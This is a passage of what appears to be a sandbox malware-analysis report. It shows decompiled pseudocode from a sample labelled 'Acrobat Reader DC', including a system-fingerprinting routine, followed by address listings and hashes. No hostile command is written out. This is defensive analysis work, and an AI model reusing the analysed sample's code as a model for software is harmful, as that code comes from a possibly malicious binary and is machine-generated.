                                  						__eflags = _t563 - 0x4a95f0;
                                  						if(_t563 == 0x4a95f0) {
                                  							goto L55;
                                  						}
                                  						_t446 =  *(_t563 + 0xc);
                                  						__eflags = _t446;
                                  						if(_t446 != 0) {
                                  							E004431AD(_t446);
                                  							 *(_t563 + 0xc) = 0;
                                  						}
                                  						_t448 =  *(_t563 + 8);
                                  						__eflags = _t448 - 8;
                                  						if(_t448 == 8) {
                                  							_t534 =  *_t563;
                                  							__eflags = _t534;
                                  							if(_t534 == 0) {
                                  								goto L49;
                                  							}
                                  							__imp__#9(_t534);
                                  							_push( *_t563);
                                  							E004111DC();
                                  							_t575 = _t575 + 4;
                                  							goto L53;
                                  						} else {
                                  							L49:
                                  							__eflags = _t448 - 0xa;
                                  							if(_t448 == 0xa) {
                                  								_t449 =  *_t563;
                                  								__eflags = _t449;
                                  								if(_t449 != 0) {
                                  									E0044318E(_t449);
                                  								}
                                  							} else {
                                  								__eflags = _t448 - 5;
                                  								if(_t448 == 5) {
                                  									E0040E270(_t563, _t563);
                                  								} else {
                                  									__eflags = _t448 - 0xb;
                                  									if(_t448 == 0xb) {
                                  										_push( *((intOrPtr*)( *_t563 + 4)));
                                  										E004111DC();
                                  										_push( *_t563);
                                  										E004111DC();
                                  										_t575 = _t575 + 8;
                                  									} else {
                                  										__eflags = _t448 - 0xc;
                                  										if(_t448 == 0xc) {
                                  											_t459 =  *_t563;
                                  											__eflags = _t459;
                                  											if(_t459 != 0) {
                                  												E0044B3D9(_t459);
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  							L53:
                                  							 *(_t563 + 8) = 1;
                                  							 *_t563 = 0;
                                  							_t450 =  *0x4a95f8; // 0x1
                                  							 *(_t563 + 8) = _t450;
                                  							_t451 =  *0x4a95f8; // 0x1
                                  							__eflags = _t451 - 1;
                                  							if(_t451 != 1) {
                                  								_t452 = _t451 - 1;
                                  								__eflags = _t452 - 0xb;
                                  								if(__eflags > 0) {
                                  									goto L55;
                                  								}
                                  								switch( *((intOrPtr*)(_t452 * 4 +  &M0042BCAE))) {
                                  									case 0:
                                  										goto L54;
                                  									case 1:
                                  										 *_t563 =  *0x4a95f0;
                                  										_t553 =  *0x4a95f4; // 0x0
                                  										 *((intOrPtr*)(_t563 + 4)) = _t553;
                                  										goto L55;
                                  									case 2:
                                  										__fp0 =  *0x4a95f0;
                                  										 *__esi = __fp0;
                                  										goto L55;
                                  									case 3:
                                  										_push(0x10);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											 *(__esi + 0xc) = 0;
                                  										} else {
                                  											__ecx =  *0x4a95fc; // 0x0
                                  											__edx =  *__ecx;
                                  											 *__eax =  *__ecx;
                                  											__edx =  *(__ecx + 4);
                                  											 *(__eax + 4) =  *(__ecx + 4);
                                  											__edx =  *(__ecx + 8);
                                  											 *(__eax + 8) = __edx;
                                  											__ecx =  *(__ecx + 0xc);
                                  											 *(__eax + 0xc) = __ecx;
                                  											 *__ecx = 1 +  *__ecx;
                                  											 *(__esi + 0xc) = __eax;
                                  										}
                                  										goto L55;
                                  									case 4:
                                  										_push(0x214);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											__eax = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											__esi =  *0x4a95f0; // 0x0
                                  											__ebx = _v124;
                                  											__ecx = 0x85;
                                  											__edi = __eax;
                                  											__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  											__esi + __ecx = __esi + __ecx + __ecx;
                                  											__ecx = 0;
                                  											__esi = _v128;
                                  											__edi = _a8;
                                  										}
                                  										 *__esi = __eax;
                                  										__eflags =  *(__eax + 4);
                                  										if( *(__eax + 4) != 0) {
                                  											__eax =  *(__eax + 4);
                                  											 *__eax = 1 +  *__eax;
                                  										}
                                  										goto L55;
                                  									case 5:
                                  										__eax =  *0x4a95f0;
                                  										 *__esi = __eax;
                                  										goto L55;
                                  									case 6:
                                  										__ecx =  *0x4a95f0;
                                  										 *__esi = __ecx;
                                  										goto L55;
                                  									case 7:
                                  										__eflags =  *0x4a95f0;
                                  										if(__eflags != 0) {
                                  											_push(0x10);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__esp = __esp + 4;
                                  											_push(__eax);
                                  											 *__esi = __eax;
                                  											__imp__#8();
                                  											__edx =  *0x4a95f0; // 0x0
                                  											__eax =  *__esi;
                                  											_push(__edx);
                                  											_push(__eax);
                                  											__imp__#10();
                                  											__eflags = __eax;
                                  											if(__eax < 0) {
                                  												__ecx =  *__esi;
                                  												_push( *__esi);
                                  												__imp__#9();
                                  												__edx =  *__esi;
                                  												_push(__edx);
                                  												__eax = E004111DC();
                                  												__esp = __esp + 4;
                                  												 *__esi = 0;
                                  											}
                                  										}
                                  										goto L55;
                                  									case 8:
                                  										__al =  *0x4a95f0;
                                  										 *__esi = __al;
                                  										goto L55;
                                  									case 9:
                                  										_push(0x18);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											goto L209;
                                  										}
                                  										__ecx =  *0x4a95f0; // 0x0
                                  										__eax = E0044B8A3(__eax, __ecx);
                                  										 *__esi = __eax;
                                  										goto L55;
                                  									case 0xa:
                                  										_push(8);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										 *__esi = __eax;
                                  										__edx =  *0x4a95f0; // 0x0
                                  										__ecx =  *__edx;
                                  										 *__eax =  *__edx;
                                  										__edx =  *__esi;
                                  										__eax =  *( *__esi);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eflags == 0) {
                                  											_push(1);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *(__ecx + 4) = __eax;
                                  											__edx =  *__esi;
                                  											__eax =  *(__edx + 4);
                                  											__esp = __esp + 4;
                                  											 *__eax = 0;
                                  										} else {
                                  											_push(__eax);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx =  *__esi;
                                  											 *( *__esi + 4) = __eax;
                                  											__eax =  *__esi;
                                  											__edx =  *__eax;
                                  											__ecx =  *0x4a95f0; // 0x0
                                  											__eax =  *(__eax + 4);
                                  											__esp = __esp + 4;
                                  											__edx =  *(__ecx + 4);
                                  											__eax = E00410E60(__eax,  *(__ecx + 4),  *(__ecx + 4));
                                  										}
                                  										goto L55;
                                  									case 0xb:
                                  										_push(0x14);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp = __esp + 4;
                                  										__eflags = __eax;
                                  										if(__eax == 0) {
                                  											L209:
                                  											__eax = 0;
                                  											 *__esi = 0;
                                  											goto L55;
                                  										}
                                  										__ecx =  *0x4a95f0; // 0x0
                                  										__eax = E00470870(__eax, __ecx);
                                  										 *__esi = __eax;
                                  										goto L55;
                                  								}
                                  							}
                                  							L54:
                                  							_t554 =  *0x4a95f0; // 0x0
                                  							 *_t563 = _t554;
                                  							goto L55;
                                  						}
                                  					}
                                  					L9:
                                  					_t490 = 0x14;
                                  					goto L10;
                                  				}
                                  			}
                                  0x0042b841
                                  0x0042b847
                                  0x0042b849
                                  0x0042b84b
                                  0x0042b84e
                                  0x0042b851
                                  0x0042b854
                                  0x0042b857
                                  0x0042b85a
                                  0x0042b85d
                                  0x0042b85f
                                  0x0042b85f
                                  0x00000000
                                  0x00000000
                                  0x0042b88a
                                  0x0042b88f
                                  0x0042b894
                                  0x0042b897
                                  0x0042b899
                                  0x0042b8be
                                  0x0042b8be
                                  0x0042b89f
                                  0x0042b89f
                                  0x0042b8a5
                                  0x0042b8a9
                                  0x0042b8ae
                                  0x0042b8b0
                                  0x0042b8b0
                                  0x0042b8b0
                                  0x0042b8b2
                                  0x0042b8b6
                                  0x0042b8b6
                                  0x0042b8c0
                                  0x0042b8c2
                                  0x0042b8c6
                                  0x0042b8cc
                                  0x0042b8cf
                                  0x0042b8cf
                                  0x00000000
                                  0x00000000
                                  0x0042b871
                                  0x0042b876
                                  0x00000000
                                  0x00000000
                                  0x0042b87d
                                  0x0042b883
                                  0x00000000
                                  0x00000000
                                  0x0042b8d6
                                  0x0042b8dd
                                  0x0042b8e3
                                  0x0042b8e5
                                  0x0042b8ea
                                  0x0042b8ed
                                  0x0042b8ee
                                  0x0042b8f0
                                  0x0042b8f6
                                  0x0042b8fc
                                  0x0042b8fe
                                  0x0042b8ff
                                  0x0042b900
                                  0x0042b906
                                  0x0042b908
                                  0x0042b90e
                                  0x0042b910
                                  0x0042b911
                                  0x0042b917
                                  0x0042b919
                                  0x0042b91a
                                  0x0042b91f
                                  0x0042b922
                                  0x0042b922
                                  0x0042b908
                                  0x00000000
                                  0x00000000
                                  0x0042b92d
                                  0x0042b932
                                  0x00000000
                                  0x00000000
                                  0x0042b939
                                  0x0042b93b
                                  0x0042b940
                                  0x0042b943
                                  0x0042b945
                                  0x00000000
                                  0x00000000
                                  0x0042b94b
                                  0x0042b953
                                  0x0042b958
                                  0x00000000
                                  0x00000000
                                  0x0042b968
                                  0x0042b96a
                                  0x0042b96f
                                  0x0042b971
                                  0x0042b977
                                  0x0042b979
                                  0x0042b97b
                                  0x0042b97d
                                  0x0042b97f
                                  0x0042b982
                                  0x0042b984
                                  0x0042b9b8
                                  0x0042b9ba
                                  0x0042b9bf
                                  0x0042b9c1
                                  0x0042b9c4
                                  0x0042b9c6
                                  0x0042b9c9
                                  0x0042b9cc
                                  0x0042b98a
                                  0x0042b98a
                                  0x0042b98b
                                  0x0042b990
                                  0x0042b992
                                  0x0042b995
                                  0x0042b997
                                  0x0042b999
                                  0x0042b99f
                                  0x0042b9a2
                                  0x0042b9a6
                                  0x0042b9ab
                                  0x0042b9b0
                                  0x00000000
                                  0x00000000
                                  0x0042b9d4
                                  0x0042b9d6
                                  0x0042b9db
                                  0x0042b9de
                                  0x0042b9e0
                                  0x0042b95f
                                  0x0042b95f
                                  0x0042b961
                                  0x00000000
                                  0x0042b961
                                  0x0042b9e6
                                  0x0042b9ee
                                  0x0042b9f3
                                  0x00000000
                                  0x00000000
                                  0x0042b806
                                  0x0040a928
                                  0x0040a928
                                  0x0040a92e
                                  0x00000000
                                  0x0040a92e
                                  0x0040a8da
                                  0x0040a829
                                  0x0040a9f5
                                  0x0040a9f8
                                  0x0040ab3a
                                  0x0040ab3d
                                  0x00000000
                                  0x00000000
                                  0x0040ab43
                                  0x0040ab4a
                                  0x00000000
                                  0x0040adf2
                                  0x0040adf4
                                  0x0040adf7
                                  0x0040ae02
                                  0x0040ae02
                                  0x0040ae05
                                  0x0042b285
                                  0x0042b288
                                  0x0042b28b
                                  0x00000000
                                  0x00000000
                                  0x0042b291
                                  0x0042b298
                                  0x00000000
                                  0x0042b29f
                                  0x0042b2a0
                                  0x0042b2a5
                                  0x00000000
                                  0x00000000
                                  0x0042b2ac
                                  0x0042b2ad
                                  0x0042b2b2
                                  0x00000000
                                  0x00000000
                                  0x0042b2de
                                  0x0042b2e3
                                  0x0042b2e7
                                  0x0042b2ef
                                  0x0042b2f4
                                  0x0042b2f9
                                  0x0042b2fd
                                  0x00000000
                                  0x00000000
                                  0x0042b2b9
                                  0x0042b2be
                                  0x0042b2c2
                                  0x0042b2ca
                                  0x0042b2cf
                                  0x0042b2d4
                                  0x0042b2d8
                                  0x0042b2fe
                                  0x0042b2fe
                                  0x0042b307
                                  0x0042b308
                                  0x0042b30d
                                  0x0042b310
                                  0x0042b312
                                  0x00000000
                                  0x00000000
                                  0x0042b31b
                                  0x0042b31e
                                  0x0042b323
                                  0x0042b325
                                  0x0042b332
                                  0x0042b339
                                  0x0042b33a
                                  0x0042b33f
                                  0x0042b344
                                  0x0042b348
                                  0x0042b34d
                                  0x0042b354
                                  0x0042b35f
                                  0x0042b362
                                  0x0042b364
                                  0x0042b36b
                                  0x0042b370
                                  0x0042b374
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b298
                                  0x0040ae0b
                                  0x0040ae0c
                                  0x0040ae0f
                                  0x00000000
                                  0x0040ae0f
                                  0x0040adf9
                                  0x0040adfc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ad9c
                                  0x0040ada1
                                  0x0040ada5
                                  0x0040adad
                                  0x0040adb2
                                  0x0040adb7
                                  0x0042b12b
                                  0x0042b130
                                  0x0042b142
                                  0x0042b136
                                  0x0042b136
                                  0x0042b13a
                                  0x0042b13a
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adc1
                                  0x0040adc4
                                  0x0040adc9
                                  0x0040adcc
                                  0x0040add1
                                  0x0040add3
                                  0x00000000
                                  0x0040add9
                                  0x0040add9
                                  0x0040ade0
                                  0x00000000
                                  0x00000000
                                  0x0040ade6
                                  0x0040adea
                                  0x00000000
                                  0x0040adea
                                  0x00000000
                                  0x0042b079
                                  0x0042b07e
                                  0x0042b082
                                  0x0042b08a
                                  0x0042b08f
                                  0x0042b092
                                  0x0042b095
                                  0x0042b097
                                  0x0042b09a
                                  0x0042b09d
                                  0x0042b0a0
                                  0x0042b0a2
                                  0x0042b0a4
                                  0x0042b0ad
                                  0x0042b0af
                                  0x0042b0b4
                                  0x0042b0b8
                                  0x0042b0bf
                                  0x0042b0c1
                                  0x0042b0c4
                                  0x0042b0c6
                                  0x00000000
                                  0x00000000
                                  0x0042b0cf
                                  0x0042b0d4
                                  0x0042b0d8
                                  0x0042b0e0
                                  0x0042b0e5
                                  0x0042b0e8
                                  0x0042b0eb
                                  0x0042b0ed
                                  0x0042b0f0
                                  0x0042b0f3
                                  0x0042b0f5
                                  0x0042b0f7
                                  0x0042b100
                                  0x0042b102
                                  0x0042b107
                                  0x0042b10b
                                  0x0042b10d
                                  0x0042b114
                                  0x0042b116
                                  0x00000000
                                  0x00000000
                                  0x0042b1d2
                                  0x0042b1d7
                                  0x0042b1db
                                  0x0042b1e0
                                  0x0042b1e3
                                  0x0042b1e5
                                  0x0042b1e8
                                  0x0042b1eb
                                  0x0042b1ed
                                  0x0042b1f0
                                  0x0042b1f3
                                  0x0042b1f5
                                  0x0042b1f7
                                  0x0042b1fa
                                  0x0042b1fd
                                  0x0042b200
                                  0x0042b204
                                  0x0042b207
                                  0x0042b20b
                                  0x0042b20e
                                  0x0042b212
                                  0x0042b214
                                  0x0042b218
                                  0x0042b21d
                                  0x0042b221
                                  0x0042b222
                                  0x0042b223
                                  0x0042b228
                                  0x0042b22a
                                  0x0042bb51
                                  0x0042bb53
                                  0x0042bb56
                                  0x0042bb65
                                  0x0042bb6a
                                  0x0042bb6a
                                  0x0042bb6e
                                  0x00000000
                                  0x0042bb6e
                                  0x0042b230
                                  0x0042b234
                                  0x0042b237
                                  0x00000000
                                  0x00000000
                                  0x0040ad09
                                  0x0040ad0e
                                  0x0040ad12
                                  0x0040ad1a
                                  0x0040ad1f
                                  0x0040ad24
                                  0x0040ae23
                                  0x0040ae28
                                  0x0042b11f
                                  0x0042b123
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2e
                                  0x0040ad32
                                  0x0040ad38
                                  0x0040ad3b
                                  0x0040ad40
                                  0x0040ad42
                                  0x0042bb47
                                  0x0042bb4b
                                  0x00000000
                                  0x0040ad48
                                  0x0040ad48
                                  0x0040ad4c
                                  0x00000000
                                  0x0040ad4c
                                  0x00000000
                                  0x0042b14b
                                  0x0042b150
                                  0x0042b154
                                  0x0042b159
                                  0x0042b160
                                  0x0042b165
                                  0x0042b16a
                                  0x0042b16e
                                  0x0042b172
                                  0x0042b177
                                  0x0042b179
                                  0x00000000
                                  0x00000000
                                  0x0042b17f
                                  0x0042b186
                                  0x00000000
                                  0x00000000
                                  0x0042b18c
                                  0x0042b190
                                  0x0042b193
                                  0x00000000
                                  0x00000000
                                  0x0042b37c
                                  0x0042b37e
                                  0x0042b3c6
                                  0x0042b3c6
                                  0x0042b3ca
                                  0x0042b3d1
                                  0x0042b3d6
                                  0x0042b3d8
                                  0x0042bb99
                                  0x0042bb9c
                                  0x0042bba1
                                  0x0042bbaf
                                  0x0042bbb4
                                  0x0042bbb8
                                  0x00000000
                                  0x0042bbb8
                                  0x0042b3de
                                  0x0042b3e0
                                  0x0042b3e3
                                  0x0042b3e7
                                  0x0042b3eb
                                  0x0042b3ed
                                  0x0042b3ef
                                  0x0042b3f7
                                  0x0042b3fc
                                  0x0042b3ff
                                  0x0042b403
                                  0x0042b404
                                  0x0042b405
                                  0x0042b406
                                  0x0042b408
                                  0x0042b40d
                                  0x0042b40f
                                  0x0042bbbe
                                  0x0042bbc1
                                  0x0042bbc6
                                  0x0042bbd1
                                  0x0042bbd6
                                  0x00000000
                                  0x0042bbd6
                                  0x0042b415
                                  0x0042b419
                                  0x0042b41d
                                  0x0042b425
                                  0x0042b42a
                                  0x0042b42c
                                  0x0042b431
                                  0x0042b435
                                  0x00000000
                                  0x0042b435
                                  0x0042b387
                                  0x0042b38b
                                  0x0042b38f
                                  0x0042b39f
                                  0x0042b39f
                                  0x0042b3b2
                                  0x0042b3b7
                                  0x0042b3b9
                                  0x0042bb74
                                  0x0042bb77
                                  0x0042bb7c
                                  0x0042bb8a
                                  0x0042bb8f
                                  0x0042bb93
                                  0x00000000
                                  0x0042bb93
                                  0x0042b3bf
                                  0x00000000
                                  0x0042b3bf
                                  0x0042b395
                                  0x0042b399
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ae16
                                  0x0040ae17
                                  0x0040ae1c
                                  0x00000000
                                  0x00000000
                                  0x0040aec0
                                  0x0040aec1
                                  0x0040aec6
                                  0x00000000
                                  0x00000000
                                  0x0040aeb6
                                  0x0040aeb8
                                  0x0040aeb9
                                  0x00000000
                                  0x00000000
                                  0x0042b244
                                  0x0042b245
                                  0x0042b24a
                                  0x00000000
                                  0x00000000
                                  0x0042b26b
                                  0x0042b26c
                                  0x0042b271
                                  0x00000000
                                  0x00000000
                                  0x0042b25e
                                  0x0042b25f
                                  0x0042b264
                                  0x00000000
                                  0x00000000
                                  0x0040accc
                                  0x0040accd
                                  0x0040acd2
                                  0x00000000
                                  0x00000000
                                  0x0040acd9
                                  0x0040acda
                                  0x0040acdf
                                  0x00000000
                                  0x00000000
                                  0x0040abfe
                                  0x0040ac02
                                  0x0040ac05
                                  0x0040ad8e
                                  0x0040ad91
                                  0x00000000
                                  0x00000000
                                  0x0042b1a0
                                  0x0040ac10
                                  0x0040ac10
                                  0x0040ac11
                                  0x00000000
                                  0x0040ac11
                                  0x0040ac0b
                                  0x0040ac0b
                                  0x00000000
                                  0x00000000
                                  0x0042b1aa
                                  0x0042b1ae
                                  0x0042b1b1
                                  0x0042b1c5
                                  0x0042b1c5
                                  0x0042b1ca
                                  0x0042b1ca
                                  0x0042b1cb
                                  0x00000000
                                  0x0042b1cb
                                  0x0042b1b7
                                  0x0042b1bc
                                  0x0042b1bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ac3d
                                  0x0040ac3e
                                  0x0040ac43
                                  0x00000000
                                  0x00000000
                                  0x0040ab52
                                  0x0040ab57
                                  0x00000000
                                  0x00000000
                                  0x0040ace6
                                  0x0040ace7
                                  0x0040acec
                                  0x00000000
                                  0x00000000
                                  0x0042b251
                                  0x0042b252
                                  0x0042b257
                                  0x00000000
                                  0x00000000
                                  0x0042b278
                                  0x0042b279
                                  0x0042b27e
                                  0x0040a83d
                                  0x0040a83d
                                  0x0040a841
                                  0x0040a845
                                  0x0040a845
                                  0x0040a849
                                  0x0040a84f
                                  0x0040ab5e
                                  0x0040a855
                                  0x0040a855
                                  0x0040a855
                                  0x0040a85c
                                  0x0040a867
                                  0x0040aaec
                                  0x0040aaef
                                  0x0040ab1f
                                  0x0040ab1f
                                  0x0040ab22
                                  0x0040ae37
                                  0x0040ae37
                                  0x0040ae3c
                                  0x0040ab31
                                  0x0040ab31
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a805
                                  0x00000000
                                  0x0040a800
                                  0x0040ae4f
                                  0x0040ae56
                                  0x0040ae5b
                                  0x0040ae5d
                                  0x0042bae5

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc
                                  • String ID: Default
                                  • API String ID: 1579825452-753088835
                                  • Opcode ID: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                  • Opcode Fuzzy Hash: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  [Control-flow graph for the function at 0x40e500; nodes are marked Executed / Not Executed. API calls on the graph: GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, FreeLibrary.]
                                  C-Code - Quality: 89%
                                  			E0040E500(intOrPtr* __edi, void* __eflags) {
                                  				void* _v8;
                                  				struct HINSTANCE__* _v12;
                                  				struct HINSTANCE__* _v20;
                                  				struct HINSTANCE__* _v24;
                                  				struct HINSTANCE__* _v32;
                                  				struct _SYSTEM_INFO _v68;
                                  				char _v70;
                                  				signed char _v72;
                                  				struct _OSVERSIONINFOW _v352;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* _t85;
                                  				char _t86;
                                  				struct HINSTANCE__* _t92;
                                  				struct HINSTANCE__* _t97;
                                  				intOrPtr* _t99;
                                  				char _t105;
                                  				intOrPtr* _t115;
                                  
                                  				_t115 = __edi;
                                  				_t116 = __edi + 0xc;
                                  				E0040BC70(__edi + 0xc, __eflags);
                                  				 *((char*)(__edi + 0x30)) = 0;
                                  				_v352.dwOSVersionInfoSize = 0x11c;
                                  				GetVersionExW( &_v352);
                                  				 *((intOrPtr*)(__edi + 8)) = _v352.dwBuildNumber;
                                  				 *__edi = _v352.dwMajorVersion;
                                  				 *((intOrPtr*)(__edi + 4)) = _v352.dwMinorVersion;
                                  				E00402160(__edi + 0xc,  &(_v352.szCSDVersion), _v352.dwMinorVersion, __edi);
                                  				E0040E660(_t116);
                                  				E0040E680(0x485330, _t116);
                                  				_t85 =  *__edi - 5;
                                  				 *((char*)(__edi + 0x2c)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x1c)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x20)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x24)) = 0;
                                  				 *((intOrPtr*)(__edi + 0x28)) = 0;
                                  				if(_t85 == 0) {
                                  					_t86 =  *((intOrPtr*)(__edi + 4));
                                  					__eflags = _t86;
                                  					if(_t86 != 0) {
                                  						__eflags = _t86 - 1;
                                  						if(_t86 != 1) {
                                  							__eflags = _t86 - 2;
                                  							if(_t86 == 2) {
                                  								__eflags = _v70 - 1;
                                  								 *((char*)(__edi + 0x1d)) = 1;
                                  								 *((char*)(__edi + 0x1f)) = 1;
                                  								 *((char*)(__edi + 0x21)) = 1;
                                  								if(_v70 != 1) {
                                  									 *((char*)(__edi + 0x20)) = 1;
                                  								} else {
                                  									 *((char*)(__edi + 0x1e)) = 1;
                                  								}
                                  							}
                                  						} else {
                                  							 *((char*)(__edi + 0x1d)) = _t86;
                                  							 *((short*)(__edi + 0x1e)) = 0x101;
                                  						}
                                  					} else {
                                  						 *((short*)(__edi + 0x1c)) = 0x101;
                                  					}
                                  					 *((char*)(_t115 + 0x30)) = (_v72 & 0x000000ff) >> 0x00000006 & 0x00000001;
                                  				} else {
                                  					if(_t85 == 1) {
                                  						_t105 =  *((intOrPtr*)(__edi + 4));
                                  						 *((char*)(__edi + 0x1d)) = 1;
                                  						 *((char*)(__edi + 0x1f)) = 1;
                                  						 *((char*)(__edi + 0x21)) = 1;
                                  						if(_t105 == 0) {
                                  							__eflags = _v70 - 1;
                                  							if(_v70 != 1) {
                                  								 *((char*)(__edi + 0x23)) = 1;
                                  								 *((short*)(__edi + 0x24)) = 0x101;
                                  							} else {
                                  								 *((short*)(__edi + 0x22)) = 0x101;
                                  							}
                                  						} else {
                                  							if(_t105 != 1) {
                                  								__eflags = _t105 - 2;
                                  								if(_t105 == 2) {
                                  									 *((short*)(__edi + 0x2a)) = 0x101;
                                  									 *((char*)(__edi + 0x29)) = 1;
                                  									 *((char*)(__edi + 0x27)) = 1;
                                  									 *((char*)(__edi + 0x23)) = 1;
                                  								}
                                  							} else {
                                  								 *((char*)(__edi + 0x23)) = _t105;
                                  								 *((char*)(__edi + 0x25)) = _t105;
                                  								if(_v70 != _t105) {
                                  									 *((char*)(__edi + 0x27)) = 1;
                                  									 *((short*)(__edi + 0x28)) = 0x101;
                                  								} else {
                                  									 *((short*)(__edi + 0x26)) = 0x101;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				_v20 = 0;
                                  				_v12 = 0;
                                  				E0040EF60( &_v20);
                                  				_t127 = _v12;
                                  				if(_v12 != 0) {
                                  					_push( &_v8);
                                  					_v8 = 0;
                                  					_push(GetCurrentProcess());
                                  					 *((intOrPtr*)(E0040EF20( &_v20, _t127)))();
                                  					if(_v8 == 1) {
                                  						 *((char*)(_t115 + 0x2c)) = 1;
                                  					}
                                  				}
                                  				_v68.dwOemId = 0;
                                  				_v68.dwPageSize = 0;
                                  				_v68.lpMinimumApplicationAddress = 0;
                                  				_v68.lpMaximumApplicationAddress = 0;
                                  				_v68.dwActiveProcessorMask = 0;
                                  				_v68.dwNumberOfProcessors = 0;
                                  				_v68.dwProcessorType = 0;
                                  				_v68.dwAllocationGranularity = 0;
                                  				_v68.wProcessorLevel = 0;
                                  				if( *((intOrPtr*)(_t115 + 0x2c)) == 0) {
                                  					GetSystemInfo( &_v68);
                                  				} else {
                                  					_v32 = 0;
                                  					_v24 = 0;
                                  					E0040EFD0( &_v32);
                                  					_t130 = _v24;
                                  					if(_v24 == 0) {
                                  						GetSystemInfo( &_v68);
                                  					} else {
                                  						_t99 = E0040EF90( &_v32, _t130); // executed
                                  						 *_t99( &_v68); // executed
                                  					}
                                  					_t97 = _v32;
                                  					if(_t97 != 0) {
                                  						FreeLibrary(_t97);
                                  					}
                                  				}
                                  				_t92 = _v20;
                                  				 *((short*)(_t115 + 0x2e)) = _v68.dwOemId;
                                  				if(_t92 != 0) {
                                  					FreeLibrary(_t92);
                                  				}
                                  				return _t115;
                                  			}






















                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                  • String ID: 0SH
                                  • API String ID: 3363477735-851180471
                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
